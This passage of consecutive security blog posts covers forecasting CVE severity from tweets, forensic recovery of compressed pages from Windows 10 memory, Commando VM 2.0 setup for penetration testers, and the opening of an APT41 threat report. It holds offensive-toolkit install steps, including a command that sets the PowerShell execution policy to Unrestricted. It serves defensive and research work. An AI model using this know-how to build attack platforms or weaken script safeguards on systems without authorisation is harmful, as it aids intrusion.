

Figure 4: Tweet showing strong adjective use


Table 1: Log-odds ratios for words correlated with highly-severe CVEs

Finally, the processed features are evaluated with two different classifiers that output scores predicting relevancy and severity. When a named entity is identified, all words comprising it are replaced with a single token to prevent the model from biasing toward that entity. The first model uses an n-gram approach, in which sequences of two, three, and four tokens are input into a logistic regression model. The second approach uses a one-dimensional Convolutional Neural Network (CNN), composed of an embedding layer, a dropout layer, and a fully connected layer, to extract features from the tweets.
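
As a rough illustration of the first model, here is a minimal n-gram plus logistic regression sketch; the training data, labels, and hyperparameters are placeholders, not the study’s.

```python
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.linear_model import LogisticRegression
from sklearn.pipeline import make_pipeline

# Toy data: named entities have already been collapsed to a single token, as
# described above. Labels are invented annotations for illustration only.
tweets = ["<ENTITY> remote code execution actively exploited, patch now",
          "patched my <ENTITY> box over the weekend, nothing exciting"]
labels = [1, 0]  # 1 = severe, 0 = not severe

model = make_pipeline(
    CountVectorizer(ngram_range=(2, 4)),   # sequences of two to four tokens
    LogisticRegression(max_iter=1000),
)
model.fit(tweets, labels)
print(model.predict(["<ENTITY> exploited in the wild, this is bad"]))
```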

Evaluating Data

To evaluate the performance of our approach, we curated a dataset of 6,000 tweets containing the keywords vulnerability or ddos from Dec 2017 to July 2018. Workers on Amazon’s Mechanical Turk platform were asked to judge whether a user believed a vulnerability they were discussing was severe. For all labeling, multiple users must independently agree on a label, and multiple statistical and expert-oriented techniques are used to eliminate spurious annotations. Five annotators were used for the labels in the relevancy classifier and ten annotators were used for the severity annotation task. Heuristics were used to remove unserious respondents; for example, when users did not agree with other annotators for a majority of the tweets. A subset of tweets were expert-annotated and used to measure the quality of the remaining annotations.

Using the features extracted from tweet contents, including word embeddings and n-grams, we built a model using the annotated data from Amazon Mechanical Turk as labels. First, our model learns if tweets are relevant to a security threat using the annotated data as ground truth. This would remove a statement like “here is how you can #exploit tax loopholes” from being confused with a cyber security-related discussion about a user exploiting a software vulnerability as a malicious tool. Second, a forecasting model scores the vulnerability based on whether annotators perceived the threat to be severe.

CVSS Forecasting Results

Both the relevancy classifier and the severity classifier were applied to various datasets. Data was collected from December 2017 to July 2018. Most notably, 1,000 tweets were held out from the original 6,000 to be used for the relevancy classifier, and 466 tweets were held out for the severity classifier. To measure performance, we use the Area Under the precision-recall Curve (AUC), a correctness score that summarizes the tradeoff between the two types of errors (false positives vs. false negatives), with scores near 1 indicating better performance.

  • The relevancy classifier scored 0.85
  • The severity classifier using the CNN scored 0.65
  • The severity classifier using a Logistic Regression model, without embeddings, scored 0.54

Next, we evaluate how well this approach can be used to forecast CVSS ratings. In this evaluation, all tweets must occur a minimum of five days ahead of CVSS scores. The severity forecast score for a CVE is defined as the maximum severity score among the tweets that are relevant and associated with the CVE. Table 2 shows the results of three models: randomly guessing the severity, modeling based on the volume of tweets covering a CVE, and the ML-based approach described earlier in the post. The scoring metric in Table 2 is precision at top K using our logistic regression model. For example, where K=100, this identifies what percentage of the 100 most severe vulnerabilities were correctly predicted. The random model correctly predicted 59, while our model predicted 78 of the top 100 and all ten of the most severe vulnerabilities.


Table 2: Comparison of random simulated predictions, a model based just on quantitative features like “likes”, and the results of our model
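
To make the precision-at-top-K metric concrete, here is a small sketch with made-up scores and labels:

```python
# Minimal sketch of precision@K: given model scores and ground-truth severity
# labels, how many of the K highest-scored CVEs are actually severe?
def precision_at_k(scores, is_severe, k):
    ranked = sorted(zip(scores, is_severe), key=lambda t: t[0], reverse=True)[:k]
    return sum(sev for _, sev in ranked) / k

# Toy example with invented scores and labels:
scores = [0.91, 0.40, 0.88, 0.15, 0.77]
is_severe = [1, 0, 1, 0, 0]
print(precision_at_k(scores, is_severe, 3))  # 2 of the top 3 -> 0.666...
```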

Exploit Forecasting Results

We also measured the practical ability of our model to identify the exploitability of a CVE in the wild, since this is one of the motivating factors for tracking. To do this, we collected severe vulnerabilities that have known exploits by their presence in the following data sources:

  • Symantec Antivirus signatures
  • Symantec Intrusion Prevention System signatures
  • ExploitDB catalog

The dataset for exploit forecasting was comprised of 377,468 tweets gathered from January 2016 to November 2017. Of the 1,409 CVEs used in our forecasting evaluation, 134 publicly weaponized vulnerabilities were found across all three data sources.

Using CVEs from the aforementioned sources as ground truth, we find our CVE classification model is more predictive of operationalized exploits than CVSS. Table 3 shows precision scores illustrating that seven of the top ten most severe CVEs and 21 of the top 100 vulnerabilities were found to have been exploited in the wild. Compare that to one of the top ten and 16 of the top 100 when using the CVSS score itself. The recall scores show the percentage of our 134 weaponized vulnerabilities found in the top K examples. Of our top ten vulnerabilities, seven were among the 134 (5.2%), while the CVSS scoring’s top ten included only one (0.7%) exploited CVE.


Table 3: Precision and recall scores for the top 10, 50 and 100 vulnerabilities when comparing CVSS scoring, our simplistic volume model and our NLP model

Conclusion

Remediating vulnerabilities promptly is critical to an organization’s information security posture, as it effectively mitigates some cyber security breaches. In our work, we found that social media content that pre-dates CVE scoring releases can be effectively used by machine learning models to forecast vulnerability scores and prioritize vulnerabilities days before official scores are made available. Our approach incorporates a novel social sentiment component, which CVE scores do not, and it allows scores to better predict real-world exploitation of vulnerabilities. Finally, our approach allows for a more practical prioritization of software vulnerabilities, effectively indicating the few that are likely to be weaponized by attackers. NIST has acknowledged that the current CVSS methodology is insufficient. The current process of scoring CVSS is expected to be replaced by ML-based solutions by October 2019, with limited human involvement. However, there is no indication that a social component will be utilized in the scoring effort.

This work was led by researchers at Ohio State under the IARPA CAUSE program, with support from Leidos and FireEye. This work was originally presented at NAACL in June 2019; our paper describes it in more detail, and the work was also covered by Wired.

Finding Evil in Windows 10 Compressed Memory, Part Three: Automating Undocumented Structure Extraction

This is the final post in the three-part series: Finding Evil in Windows 10 Compressed Memory. In the first post (Volatility and Rekall Tools), the FLARE team introduced updates to both memory forensic toolkits. These updates enabled these open source tools to analyze previously inaccessible compressed data in memory. This research was shared with the community at the 2019 SANS DFIR Austin conference and is available on GitHub (Volatility and Rekall). In the second post (Virtual Store Deep Dive), we looked at the structures and algorithms involved in locating and extracting compressed pages from the Store Manager. The post included a walkthrough of a memory dump designed for analysts to be able to recreate in their own Windows 10 environments. The structures referenced in the walkthrough were all previously analyzed in a disassembler, a manual effort which came in at around eight hours. As you’d expect, this task quickly became a candidate for automation. Our analysis time is now under two minutes!

This final post accompanies my and Dimiter Andonov's BlackHat USA 2019 talk, which shares the series title, and describes the challenges faced in maintaining software that ultimately relies on undocumented structures. Here we introduce a solution that reduces the level of effort needed to analyze undocumented structures.

Overview

Undocumented structures within the Windows kernel are always subject to change. The flexibility granted by not publicizing a structure’s composition can be invaluable to a development team. It can allow the system to grow unencumbered by the need to update helper functions and public documentation. In many cases, even when a publicly available API designed to access the undocumented structures can be leveraged on a live system, incident responders and memory forensic analysts don’t have the luxury of utilizing it. DFIR analysts operating on memory extractions or snapshots must ultimately use tools that recreate the job of an API by manually parsing and traversing structures and reimplementing the algorithms used.

Unfortunately, these structures and algorithms are not always up to date in the analysts’ toolkit, leading to incomplete extractions or completely broken investigations. These tools may cease to work after any given update. This is the case with the Windows kernel’s Store Manager component. Structures relied on to locate compressed data in RAM are constantly evolving. This requires some flexibility built into the plugins and a means of reducing the analysis time required to reconstruct these structures.

Leveraging flare-emu

To ease my Store Manager analysis efforts, I looked into Tom Bennett’s flare-emu utility. flare-emu can be viewed as the marriage of IDA Pro with the Unicorn emulation engine. The original use of the framework was to clean up Objective-C function call names due to ambiguity stemming from the unknown id argument for calls to objc_msgSend. Tom was able to use emulation to resolve the ambiguity and clean up his analysis environment. The value I saw in the framework was that the barrier to entry for using Unicorn was now lowered to a point where it could be used to rapidly prototype ideas. flare-emu handles PE loading, memory faults, and function calls while guaranteeing traversal over code you would like to reach.

After analyzing a dozen Windows 10 kernels, I had become familiar enough with the process to begin automating the effort. Automating the analysis of undocumented structures and algorithms requires one or more of the following properties to remain constant across builds.

  • Structure locations
  • Function prototypes
  • Order of structure memory access
  • Structure field usage
  • Callstacks

Let’s explore the example of locating the offset of ST_DATA_MGR.wCompressionFormat. As shown in Figure 1, this field is the first argument to RtlDecompressBufferEx. This function is publicly available and documented. This is how we originally derived that offset 0x220 in the ST_DATA_MGR structure corresponded to the compression format of the store page in Windows 10 1703 (x86).


Figure 1: Call to RtlDecompressBufferEx; note that the compression format originates from ST_DATA_MGR

To leverage flare-emu in automating the extraction of the value 0x220, we have a few options. For example, from analysis of other kernels, we know that the access to ST_DATA_MGR immediately before decompression is likely to be the compression format. In this case, a stronger extraction algorithm can be leveraged by prepopulating ST_DATA_MGR with a known pattern (see Figure 2).


Figure 2: Known pattern copied into ST_DATA_MGR buffer

Using flare-emu, we emulate the function in which this call is located and examine the stack post-emulation.

  • 0x20101000
  • 0x1163
  • 0x31001200
  • 0x1423
  • 0x20001400
  • “Km”

Figure 3: Post-emulation stack layout

Knowing that the wCompressionFormat argument originated from the ST_DATA_MGR structure, we see that it is now “Km”. If we were to search for that value in the known pattern, we would find that it begins at offset 0x220. Check out Figure 4 to see how we can leverage flare-emu to solve this challenge.


Figure 4: Code snippet from w10deflate_auto project demonstrating the automation of wCompressionFormat

The decorators preceding the function signify that the extraction algorithm will work on both 32-bit and 64-bit architectures. After generating a known pattern using a helper function within my project, flare-emu is used to allocate a buffer, storing a pointer to it in lp_stdatamgr. The pointer is written into the ECX register because I know that the first argument to the parent function, StDmSinglePageCopy, is the pointer to the ST_DATA_MGR structure. The pHook function populates ECX prior to the emulation run. The helper function locate_call_in_fn is used to perform a relaxed search for RtlDecompressBufferEx within StDmSinglePageCopy. Using flare-emu’s iterate function, I force emulation to reach the decompression call, at which point I read the first item on the stack and then search for it within my known pattern.
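
Independent of flare-emu’s specific API, the heart of the trick is the known pattern itself: fill the structure buffer with bytes whose position can be recovered later, then search for whatever value the emulated code consumed. Below is a minimal sketch with the emulation step abstracted away; the pattern scheme is our own illustration, not flare-emu’s helper.

```python
import string

# Minimal sketch of the known-pattern trick, with the emulation step abstracted
# away; the pattern scheme here is illustrative, not flare-emu's own helper.
ALPHABET = (string.ascii_uppercase + string.ascii_lowercase).encode()

def make_pattern(length):
    """Fill a buffer so that every aligned 2-byte pair is distinct."""
    out = bytearray()
    for a in ALPHABET:
        for b in ALPHABET:
            out += bytes([a, b])
            if len(out) >= length:
                return bytes(out[:length])
    return bytes(out[:length])

st_data_mgr = make_pattern(0x400)      # stand-in for the ST_DATA_MGR buffer
leaked = st_data_mgr[0x220:0x222]      # the value emulation would find on the stack
offset = next(i for i in range(0, len(st_data_mgr), 2) if st_data_mgr[i:i+2] == leaked)
print(leaked, hex(offset))             # b'FM' 0x220 -- the field offset is recovered
```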

Techniques like the one described above are ultimately used to retrieve all structure fields involved in the page decompression and can be leveraged in other situations in which an undocumented structure may need tracking across Windows builds. Figure 5 shows the automation utility extracting the fields of the undocumented structures used by the Volatility and Rekall plugins.


Figure 5: Output of automation from within IDA Pro

Keeping Volatility and Rekall Updated

The data generated by the automation script is primarily useful when implemented in Volatility and Rekall. In both Volatility and Rekall, the win10_memcompression.py overlay contains all structure definitions needed for page location and decompression. Figure 6 shows a snippet from the file in which the Windows 10 1903 x86 profile is created.


Figure 6: Structure definition found within the win10_memcompression.py overlay

Create a new profile dictionary (e.g., win10_mem_comp_x86_1903) corresponding to the Windows build that you are targeting and populate the structure entries accordingly.

Conclusion

Undocumented structures pose a challenge to those who rely on them. This blog post covered how flare-emu can be leveraged to reduce the level of effort needed to analyze new kernel builds. We analyzed the extraction of an ST_DATA_MGR field used in page decompression by presenting the problem and then the code involved with automating the effort. The automation code is available on the FireEye GitHub, with usage information and documentation available in both the README and the code.

Finding Evil in Windows 10 Compressed Memory, Part Two: Virtual Store Deep Dive

Introduction

This blog post is the second in a three-part series covering our Windows 10 memory forensics research and it coincides with our BlackHat USA 2019 presentation. In Part One of the series, we covered the integration of the research in both the Volatility and Rekall memory forensics tools. We demonstrated that forensic artifacts (including reflectively loaded malware) could remain undiscovered without the FLARE research integration on Windows 10 (available on GitHub at win10_volatility and win10_rekall).

In this post, we demonstrate how to retrieve a compressed page using the structures and algorithms described in our white paper. We track down a compressed page in memory, beginning at its virtual address within a known process. A WinDbg kernel debugger setup is used in this walkthrough, but a similar process could be followed from within a memory snapshot or extraction using Volatility or Rekall.

Finding a Compressed Page

The operating system used in this demo is Windows 10.0.15063.0 (x64) and the structure definitions shown will be applicable across any 1703 build. Note that the two global offsets nt!SmGlobals and nt!MmPagingFile will need to be located for each revision. The process of retrieving these global offsets is described further in our white paper.

To begin analysis, we create a marker page and flush it to the Virtual Store. This can be done in several ways, the easiest of which is allocating memory in a memory constrained virtual machine.  A simple utility (ram_eater.exe) was created to perform this task. The ram_eater utility allocates and writes a marker page, and then repeatedly allocates more memory in user-specified page amounts. In a memory constrained virtual machine (1 GB RAM), the marker page will become stale shortly and be evicted to the virtual store. In Figure 1, ram_eater reports that it has allocated the marker page at address 0x2a368480000. The marker page we used (see Figure 2) was a string beginning with “CC WAS HERE!”.


Figure 1: Allocating a marker page using ram_eater_x64.exe

We can verify the contents of our marker page by locating it in the kernel debugger, viewing its Page Table Entry (PTE) and dumping its corresponding physical memory (see Figure 2). We use the !process extension to locate ram_eater’s EPROCESS structure and switch into the context of the ram_eater process. This ensures that we traverse the correct process-specific page tables for the ram_eater process. Using the page frame number (pfn) described by the hardware PTE, we dump the physical memory to validate the contents of our marker page. Page frame numbers do not include the low-order bits used to specify an offset into a page, therefore they must be multiplied by PAGE_SIZE (0x1000) to identify the actual address of the data.


Figure 2: Locating and viewing the marker page from the kernel debugger
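
As a quick arithmetic check of that last step, with a hypothetical page frame number standing in for the one read from the PTE:

```python
PAGE_SIZE = 0x1000

# Hypothetical PFN for illustration; the walkthrough reads the real value from
# the hardware PTE in the kernel debugger. The virtual address is the one
# ram_eater reported for the marker page.
pfn = 0x1ad93
virtual_address = 0x2a368480000
physical_address = pfn * PAGE_SIZE + (virtual_address & (PAGE_SIZE - 1))
print(hex(physical_address))  # 0x1ad93000 for this page-aligned allocation
```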

After allocating additional memory using ram_eater, we check to see if the marker page has been sent to the virtual store. Each entry in the output of the !vm extension can be treated as an index into nt!MmPagingFile (see Figure 3).


Figure 3: PTE of a compressed page in the virtual store and confirmation of the virtual store’s PageFile index

In the PTE displayed in Figure 3, the PageFile index (MMPTE_SOFTWARE.PageFileLow) is 2 and corresponds to the “No Name for Paging File” entry in the !vm extension’s output. From general observation, we know that on a default Windows configuration, the last entry corresponds to the virtual store. It is possible to configure systems with more than a single PageFile on disk, so do not assume that PageFile index 2 will always correlate to the virtual store.

A more thorough option to validate page file indices is to disassemble nt!MmStoreCheckPagefiles. This function contains references to two global variables: the number of active PageFiles and an array of pointers to each nt!_MMPAGING_FILE structure (see Figure 4). We use the PageFile structure’s newly introduced VirtualStorePagefile field to confirm whether the PageFile represents a virtual store.


Figure 4: Locating nt!MmPagingFile in WinDbg and dumping system’s nt!_MMPAGING_FILE structures

Having confirmed that the marker page is in the virtual store, the next step is to calculate the Store Manager Page Key (SM_PAGE_KEY), as it serves as a pseudo-handle to locate the decompressed page. Our white paper details the process used to calculate the SM_PAGE_KEY, which turns out to be 0x201a3061 for this example. Note that we will not use the PTE’s swizzle bit in the page key calculations, since the OS build is below 1803. To begin page retrieval, the pointer to the Store Manager’s global structure, nt!SmGlobals, needs to be located. This is a straightforward process if symbols are available (see Figure 5).


Figure 5: Dumping nt!SmGlobals

The first thing to observe is that both SMKM_STORE_MGR and SMKM are located at offset 0x0, directly at nt!SmGlobals. Viewed as a memory dump, nt!SmGlobals appears as an array of pointers; logically, it is a two-dimensional array (32x32) of SMKM_STORE_METADATA elements, in which each pointer points to an array of 32 SMKM_STORE_METADATA structures. Each SMKM_STORE_METADATA structure represents a store. To locate the store corresponding to our SM_PAGE_KEY, we need to find the store index associated with the page key inside the SMKM_STORE_MGR.sGlobalTree B+tree container. The store index is a compound value that yields both indices needed to select the particular SMKM_STORE_METADATA element. Let’s traverse the SMKM_STORE_MGR’s global B+tree (Figure 6). Recall that we are interested in a store manager page key value of 0x201a3061.


Figure 6: Traversing the global B+tree

Now that we have the store index (obtained from the SMKM_FRONTEND_ENTRY structure), we calculate both indices to select the correct SMKM_STORE_METADATA structure for our SM_PAGE_KEY. The index into the pointer array is the result of dividing the retrieved store index by 32, while the second index is the remainder of that division. In our case both indices are 0, selecting the first of the 1024 stores on the system, which is reserved for legacy applications. Universal Windows Platform (UWP) applications, on the other hand, are placed in stores 1 through 1023. Now, with the SMKM_STORE_METADATA known, we examine the store’s SMKM_STORE structure, as shown in Figure 7.


Figure 7: Dumping the SMKM_STORE structure
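
The index arithmetic from the previous step fits in a couple of lines:

```python
# The store index retrieved from the global B+tree selects one of the 1024
# (32 x 32) SMKM_STORE_METADATA entries: divide by 32 for the pointer-array
# index, take the remainder for the index within that array.
store_index = 0          # the value recovered for our SM_PAGE_KEY
outer, inner = divmod(store_index, 32)
print(outer, inner)      # 0 0 -> the first (legacy) store
```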

Once we have our SMKM_STORE structure we traverse another B+tree that associates our SM_PAGE_KEY (0x201a3061) with a chunk key. The chunk key is a compound value and once decoded points to a specific page record inside SMHP_CHUNK_METADATA's two-dimensional aChunkPointer array. The B+tree traversal is shown in Figure 8.


Figure 8: Traversing the local B+tree to find the chunk key associated with the SM_PAGE_KEY

After the B+tree traversal is complete, we find that our chunk key is 4b02d. Since it is a compound value, we need to decode it in order to retrieve the two indices into SMHP_CHUNK_METADATA’s chunk pointer array, as well as the offset within the located chunk. The decoding involves four additional SMHP_CHUNK_METADATA fields – dwVectorSize, dwPageRecordsPerChunk, dwPageRecordSize, and dwChunkPageHeaderSize. The process is shown in Figure 9.


Figure 9: Retrieving the page record associated with the chunk key

The decoding of the chunk key in Figure 9 allowed us to find all the information to derive the virtual address of our compressed page. The retrieved REGION_KEY (0xf72397, in our case) is also a compound value that encodes the index within the SMKM_STORE’s region pointer array, as well as the offset within the region of pages. To calculate this data, we parse the region key with the help of two fields inside the ST_DATA_MGR structure – dwRegionIndexMask and dwRegionSizeMask. The calculations are shown in Figure 10.


Figure 10: Calculating the compressed page’s virtual address

The virtual address 0x12f3970 calculated in Figure 10 contains the compressed page of interest. We can retrieve it from the MemCompression process space, as shown in Figure 11. To confirm that the compressed memory is located within MemCompression, check the SMKM_STORE structure’s StoreOwnerProcess field.


Figure 11: Retrieving the compressed page from within MemCompression process space

The compressed page can be decompressed with a call to the RtlDecompressBufferEx API or any other implementation that supports the XPRESS compression algorithm.
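
On a live Windows system, a hedged sketch of that final decompression step might look like the following; the compressed page bytes are assumed to have already been read out of the MemCompression process.

```python
import ctypes
from ctypes import wintypes

# Hedged sketch (Windows only): decompress an XPRESS-compressed page with the
# same ntdll API the kernel uses. `compressed` would hold the page bytes pulled
# from MemCompression; here it is just a parameter.
ntdll = ctypes.WinDLL("ntdll")
COMPRESSION_FORMAT_XPRESS = 0x0003
PAGE_SIZE = 0x1000

def xpress_decompress(compressed: bytes) -> bytes:
    ws_size = wintypes.ULONG(0)
    frag_size = wintypes.ULONG(0)
    # Ask the OS how large a workspace RtlDecompressBufferEx needs.
    ntdll.RtlGetCompressionWorkSpaceSize(
        wintypes.USHORT(COMPRESSION_FORMAT_XPRESS),
        ctypes.byref(ws_size), ctypes.byref(frag_size))
    workspace = ctypes.create_string_buffer(ws_size.value)
    out = ctypes.create_string_buffer(PAGE_SIZE)
    final_size = wintypes.ULONG(0)
    status = ntdll.RtlDecompressBufferEx(
        wintypes.USHORT(COMPRESSION_FORMAT_XPRESS),
        out, wintypes.ULONG(PAGE_SIZE),
        compressed, wintypes.ULONG(len(compressed)),
        ctypes.byref(final_size), workspace)
    if status != 0:
        raise OSError(f"RtlDecompressBufferEx failed: 0x{status & 0xffffffff:x}")
    return out.raw[:final_size.value]
```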

Conclusion

In this blog post, we shared a walkthrough in which we forced a known marker page into the compression store and manually retrieved it by walking through memory dumps using known structure offsets from Windows 10 1703 x64. The same techniques can be applied to Windows 10 1607 and onwards, assuming the correct structure offsets are known. In Part 3 of the series, Automating Undocumented Structure Extraction, we will look at how the FLARE team leveraged emulation via flare-emu to automate the extraction of the structures used in this walkthrough.

Resources

Commando VM 2.0: Customization, Containers, and Kali, Oh My!

The Complete Mandiant Offensive Virtual Machine (“Commando VM”) took the penetration testing community by storm when it debuted in early 2019 at Black Hat Asia Arsenal. Our 1.0 release made headway featuring more than 140 tools. Now we are back again for another spectacular release, this time at Black Hat USA Arsenal 2019! In this 2.0 release we’ve listened to the community and implemented some new must-have features: Kali Linux, Docker containers, and package customization.

About Commando VM

Penetration testers commonly use their own variants of Windows machines when assessing Active Directory environments. We specifically designed Commando VM to be the go-to platform for performing internal penetration tests. The benefits of using Commando VM include native support for Windows and Active Directory, using your VM as a staging area for command and control (C2) frameworks, more easily (and interactively) browsing network shares, and using tools such as PowerView and BloodHound without any worry about placing output files on client assets.

Commando VM uses Boxstarter, Chocolatey, and MyGet packages to install software and delivers many tools and utilities to support penetration testing. With over 170 tools and growing, Commando VM aims to be the de facto Windows machine for every penetration tester and red teamer.

Recent Updates

Since its initial release at Black Hat Asia Arsenal in March 2019, Commando VM has received three additional updates, including new tools and/or bug fixes. We closed 61 issues on GitHub and added 26 new tools. Version 2.0 brings three major new features, more tools, bug fixes, and much more!

Kali Linux

In 2016 Microsoft released the Windows Subsystem for Linux (WSL). Since then, pentesters have been trying to leverage this capability to squeeze more productivity out of their Windows systems. The fewer virtual machines you need to run, the better. With WSL you can install Linux distributions from the Windows Store and run common Linux commands in a terminal, such as starting up an SSH, MySQL or Apache server, automating mundane tasks with common scripting languages, and utilizing many other Linux applications within the same Windows system.

In January 2018, Offensive Security announced support for Kali Linux in WSL. With our 2.0 release, Commando VM officially supports Kali Linux on WSL. To get the most out of Kali, we've also included VcXsrv, an X Server that allows us to display the entire Linux GUI on the Windows Desktop (Figure 1). Displaying the Linux GUI and passing windows to Windows had been previously documented by Offensive Security and other professionals, and we have combined these to include the GUI as well as shortcuts to take advantage of popular programs such as Terminator (Figure 2) and DirBuster (Figure 3).


Figure 1: Kali XFCE on WSL with VcXsrv


Figure 2: Terminator on Commando VM – Kali WSL with VcXsrv


Figure 3: DirBuster on Commando VM – Kali WSL with VcXsrv

Docker

Docker is becoming increasingly popular within the penetration testing community. Multiple blog posts exist detailing interesting functionality using Docker for pentesting. Based on its popularity Docker has been on our roadmap since the 1.0 release in March 2019, and we now support it with our release of Commando VM 2.0. We pull tools such as Amass and SpiderFoot and provide scripts to launch the containers for each tool. Figure 4 shows an example of SpiderFoot running within Docker.


Figure 4: Impacket container running on Docker

For command-line Docker containers, such as Amass, we created a PowerShell script to automatically run Amass commands through Docker. This script is also added to the PATH, so users can call amass from anywhere. The script is shown in Figure 5. We encourage users to come up with their own scripts to do more creative things with Docker.


Figure 5: Amass.ps1 script

This script is also executed when the shortcut is opened.


Figure 6: Amass Docker container executed via PowerShell script

Customization

Not everyone needs all of the tools all of the time. Some tools can extend the installation process by hours, take up many gigabytes of hard drive space, or come with unsuitable licenses and user agreements. On the other hand, maybe you would like to install additional reversing tools available within our popular FLARE VM; or you would prefer one of the many alternative text editors or browsers available from the chocolatey community feed. Either way, we would like to provide the option to selectively install only the packages you desire. Through customization you and your organization can also share or distribute the profile to make sure your entire team has the same VM environment. To provide for these scenarios, the last big change for Commando 2.0 is the support for installation customization. We recommend using our default profile, and removing or adding tools to it as you see fit. Please read the following section to see how.

How to Create a Custom Install

Before we start, please note that after customizing your own edition of Commando VM, the cup all command will only upgrade packages pre-installed within your customized distribution. New packages released by our team in the future will not be installed or upgraded automatically with cup all. When needed, these new packages can always be installed manually using the cinst or choco install command, or by adding them to your profile before a new install.

Simple Instructions

  1. Download the zip from https://github.com/fireeye/commando-vm into your Downloads folder.
  2. Decompress the zip and edit the ${Env:UserProfile}\Downloads\commando-vm-master\commando-vm-master\profile.json file by removing tools or adding tools in the “packages” section. Tools are available from our package list or from the chocolatey repository.
  3. Open an administrative PowerShell window and enable script execution.
    • Set-ExecutionPolicy Unrestricted -f
  4. Change to the unzipped project directory.
    • cd ${Env:UserProfile}\Downloads\commando-vm-master\commando-vm-master\
  5. Execute the install with the -profile_file argument.
    • .\install.ps1 -profile_file .\profile.json

Detailed Instructions

To start customizing your own distribution, you need the following three items* from our public GitHub repository:

  1. Our install.ps1 script
  2. Our sample profile.json
  3. An installation template. We recommend using commandovm.win10.installer.fireeye.

*Note: If you download the project ZIP from GitHub it will contain all three items.

The install script will now support an optional -profile_file argument, which specifies a JSON profile. Without the -profile_file argument, running .\install.ps1 will install the default Commando VM distribution. To customize your edition of Commando VM, you need to create a profile in JSON format, and then pass that to the -profile_file argument. Let us explore the sample profile.json profile (Figure 7).


Figure 7: profile.json profile

This JSON profile starts with the env dictionary which specifies many environment variables used by the installer. These environment variables can, and should, be left to their default values. Here is a list of the supported environment variables:

  • VM_COMMON_DIR specifies where the shared libraries should be installed on the VM. After a successful install, you will find a FireEyeVM.Common directory within this location. This contains a PowerShell module that is shared by our packages.
  • TOOL_LIST_DIR and TOOL_LIST_SHORTCUT specify which directory contains the list of all installed packages within the Start Menu and the name of the desktop shortcut, respectively.
  • RAW_TOOLS_DIR environment variable specifies the location where some tools will be installed. Chocolatey defaults to installing tools in %ProgramData%\Chocolatey\lib. This environment variable by default points to %SystemDrive%\Tools, allowing you to more easily access some tools on the command line.
  • And, finally, TEMPLATE_DIR specifies a template package directory relative to where install.ps1 is on disk. We strongly recommend using the commandovm.win10.installer.fireeye package available on our GitHub repository as the template. If your VM is running Windows 7, please switch to the appropriate commandovm.win7.installer.fireeye package. If you are feeling “hacky” and adventurous, feel free to customize the installer further by modifying the chocolateyinstall.ps1 and chocolateyuninstall.ps1 scripts within the tools directory of the template. Note that a proper template will be a folder containing at least 5 things: (1) a properly formatted nuspec file, (2) a “tools” folder that contains (3) a chocolateyinstall.ps1 file, (4) a chocolateyuninstall.ps1 file, and (5) a profile.json file. If you use our template, the only thing you need to change is the packages.json file. The easiest way to do this is just download and extract the commando-vm zip file from GitHub.

With the environment variables set, you can now specify which packages to install in your distribution. Some packages accept additional installation arguments; you can see an example of this by looking at the openvpn.fireeye entry. For a complete list of packages available from our feed, please see our package list.
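
If you prefer to script the profile edits rather than hand-edit the JSON, a sketch along these lines can work. The top-level "packages" key comes from the sample profile described above, but the exact shape of each package entry may differ, so treat this as a hedged starting point and adjust it to the file you actually downloaded.

```python
import json

# Hedged sketch: produce a trimmed copy of the sample profile before running
# install.ps1 -profile_file. Package names below are hypothetical placeholders.
UNWANTED = {"example.heavy.package"}

with open("profile.json") as fh:
    profile = json.load(fh)

def keep(entry):
    # Package entries may be plain strings or small dictionaries; handle both.
    name = entry.get("name") if isinstance(entry, dict) else str(entry)
    return name not in UNWANTED

profile["packages"] = [p for p in profile["packages"] if keep(p)]

with open("myprofile.json", "w") as fh:
    json.dump(profile, fh, indent=2)
```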

Once you finish modifying your profile, you are ready for installation. Run powershell.exe with elevated privileges and execute the following commands to install your own edition of Commando VM, assuming you saved your version of the profile as myprofile.json (Figure 8).


Figure 8: Example myprofile.json

The myprofile.json file can then be shared and distributed throughout your entire organization to ensure everyone has the same VM environment when installing Commando VM.

Conclusion

Commando VM was originally designed to be the de facto Windows machine for every penetration tester and red teamer. Now, with the addition of Kali Linux support, Docker and installation customization, we hope it will be the one machine for all penetration testers and red teamers. For a complete list of tools, and for the installation script, please see the Commando VM GitHub repository. We look forward to addressing user feedback, adding more tools and features, and creating many more enhancements for this Windows attack platform.

APT41: A Dual Espionage and Cyber Crime Operation

Today, FireEye Intelligence is releasing a comprehensive report detailing APT41, a prolific Chinese cyber threat group that carries out state-sponsored espionage activity in parallel with financially motivated operations. APT41 is unique among tracked China-based actors in that it leverages non-public malware typically reserved for espionage campaigns in what appears to be activity for personal gain. Explicit financially-motivated targeting is unusual among Chinese state-sponsored threat groups, and evidence suggests APT41 has conducted simultaneous cyber crime and cyber espionage operations from 2014 onward.

The full published report covers historical and ongoing activity attributed to APT41, the evolution of the group’s tactics, techniques, and procedures (TTPs), information on the individual actors, an overview of their malware toolset, and how these identifiers overlap with other known Chinese espionage operators. APT41 partially coincides with public reporting on groups including BARIUM (Microsoft) and Winnti (Kaspersky, ESET, Clearsky).

Who Does APT41 Target?

Like other Chinese espionage operators, APT41 espionage targeting has generally aligned with China's Five-Year economic development plans. The group has established and maintained strategic access to organizations in the healthcare, high-tech, and telecommunications sectors. APT41 operations against higher education, travel services, and news/media firms provide some indication that the group also tracks individuals and conducts surveillance. For example, the group has repeatedly targeted call record information at telecom companies. In another instance, APT41 targeted a hotel’s reservation systems ahead of Chinese officials staying there, suggesting the group was tasked to reconnoiter the facility for security reasons.

The group’s financially motivated activity has primarily focused on the video game industry, where APT41 has manipulated virtual currencies and even attempted to deploy ransomware. The group is adept at moving laterally within targeted networks, including pivoting between Windows and Linux systems, until it can access game production environments. From there, the group steals source code as well as digital certificates which are then used to sign malware. More importantly, APT41 is known to use its access to production environments to inject malicious code into legitimate files which are later distributed to victim organizations. These supply chain compromise tactics have also been characteristic of APT41’s best known and most recent espionage campaigns.

Interestingly, despite the significant effort required to execute supply chain compromises and the large number of affected organizations, APT41 limits the deployment of follow-on malware to specific victim systems by matching against individual system identifiers. These multi-stage operations restrict malware delivery only to intended victims and significantly obfuscate the intended targets. In contrast, a typical spear-phishing campaign’s desired targeting can be discerned based on recipients' email addresses.

A breakdown of industries directly targeted by APT41 over time can be found in Figure 1.

 


Figure 1: Timeline of industries directly targeted by APT41

Probable Chinese Espionage Contractors

